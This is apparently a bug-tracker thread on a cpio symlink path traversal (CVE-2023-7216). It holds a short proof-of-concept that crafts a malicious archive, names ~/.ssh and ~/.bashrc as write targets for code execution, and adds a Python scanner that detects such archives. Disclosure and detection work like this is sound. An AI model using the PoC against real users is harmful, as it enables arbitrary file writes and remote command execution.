Summary: CPIO found to be vulnerable to a Path Traversal vulnerability that can be leveraged to achieve full Remote Command Execution on the target.

Details: While handling CPIO archives, cpio by default follows stored symlinks while extracting, and the archiver does not check the symlink location, which leads to arbitrary file writes to unintended locations. When the victim extracts the archive, the attacker can craft a malicious cpio archive to achieve RCE on the target system.

PoC (steps to reproduce): Complete instructions to craft a cpio archive to demonstrate the vulnerability.

```
mkdir testcpio
# symlink entry pointing outside the extraction directory
ln -sf /tmp/ testcpio/tmp
echo "TEST Traversal" > testcpio/tmpYtrav.txt
cd testcpio/
ls | cpio -ov > ../trav.cpio
cd ../
# rewrite the stored name "tmpYtrav.txt" to "tmp/trav.txt" so it resolves through the symlink
sed -i s/"tmpY"/"tmp\/"/g trav.cpio
```

Extract the malicious archive:

```
cpio -i < trav.cpio
```

Impact: An attacker can craft malicious cpio archives that exploit the vulnerability to write files to locations such as ~/.ssh, ~/.bashrc, ~/.config/autostart/ etc., to achieve full remote command execution on the target/victim system. Software that uses CPIO as a component might be vulnerable.

Credit: Febin Mon Saji
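As an added example (not from the report above or from cpio itself), a Python pre-extraction scanner that walks a cpio archive and flags entries whose path passes through an earlier symlink entry, the write-through-symlink pattern the PoC produces, along with absolute and `..` paths. It assumes the portable SVR4 "newc" header format (the PoC uses cpio's default format, but the check is the same) and builds its sample archive inline; `build_newc`, `iter_newc` and `unsafe_entries` are names chosen here.

```python
import posixpath
import stat

NEWC_MAGIC = b"070701"  # SVR4 portable ASCII ("newc") cpio header magic

def build_newc(entries):
    """Constructed helper: serialise (name, mode, data) tuples as a newc archive."""
    out = bytearray()
    for ino, (name, mode, data) in enumerate(entries + [("TRAILER!!!", 0, b"")], 1):
        nm = name.encode() + b"\0"
        # 13 eight-digit hex fields; a symlink's data is its target, as cpio stores it
        fields = (ino, mode, 0, 0, 1, 0, len(data), 0, 0, 0, 0, len(nm), 0)
        out += NEWC_MAGIC + b"".join(b"%08x" % v for v in fields) + nm
        out += b"\0" * (-len(out) % 4)  # header+name padded to 4 bytes
        out += data
        out += b"\0" * (-len(out) % 4)  # data padded to 4 bytes
    return bytes(out)

def iter_newc(blob):
    """Yield (name, mode, data) for each entry up to the TRAILER!!! record."""
    pos = 0
    while True:
        if blob[pos:pos + 6] != NEWC_MAGIC:
            raise ValueError("bad newc magic at offset %d" % pos)
        f = [int(blob[pos + 6 + 8 * i:pos + 14 + 8 * i], 16) for i in range(13)]
        mode, filesize, namesize = f[1], f[6], f[11]
        name = blob[pos + 110:pos + 110 + namesize - 1].decode()
        pos += 110 + namesize + (-(pos + 110 + namesize) % 4)  # skip name + pad
        data = blob[pos:pos + filesize]
        pos += filesize + (-(pos + filesize) % 4)  # skip data + pad
        if name == "TRAILER!!!":
            return
        yield name, mode, data

def unsafe_entries(blob):
    """Return (name, reason) for entries a symlink-following extractor could misplace."""
    symlinks, findings = set(), []
    for name, mode, _ in iter_newc(blob):
        parts = posixpath.normpath(name).split("/")
        if name.startswith("/") or ".." in parts:
            findings.append((name, "absolute or parent-relative path"))
        # The report's case: a file under a directory that an earlier entry
        # turned into a symlink, so the write lands at the link target.
        for i in range(1, len(parts)):
            if "/".join(parts[:i]) in symlinks:
                findings.append((name, "path goes through symlink %r" % "/".join(parts[:i])))
                break
        if stat.S_ISLNK(mode):
            symlinks.add("/".join(parts))
    return findings
```

Run `unsafe_entries(open(path, "rb").read())` on an untrusted archive and refuse extraction when it returns anything; extracting into a fresh, empty directory remains the simplest mitigation.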
This attack requires social engineering the user into opening the cpio archive; the impact of this is moderate.
*** Bug 2255243 has been marked as a duplicate of this bug. ***
Looks very similar to CVE-2015-1197 - https://bugzilla.redhat.com/show_bug.cgi?id=1179773
There is a question in upstream list about this CVE in https://lists.gnu.org/archive/html/bug- cpio/2024-02/msg00000.html
Marian, can you help with this question? Corrected link is https://lists.gnu.org/archive/html/bug-cpio/2024-02/msg00000.html
https://lists.gnu.org/archive/html/bug-cpio/2024-03/msg00000.html CVE-2023-7216 has been rejected by the upstream community; the cpio maintainer doesn't think it's a bug. Is the Red Hat community considering marking CVE-2023-7216 as rejected on NVD?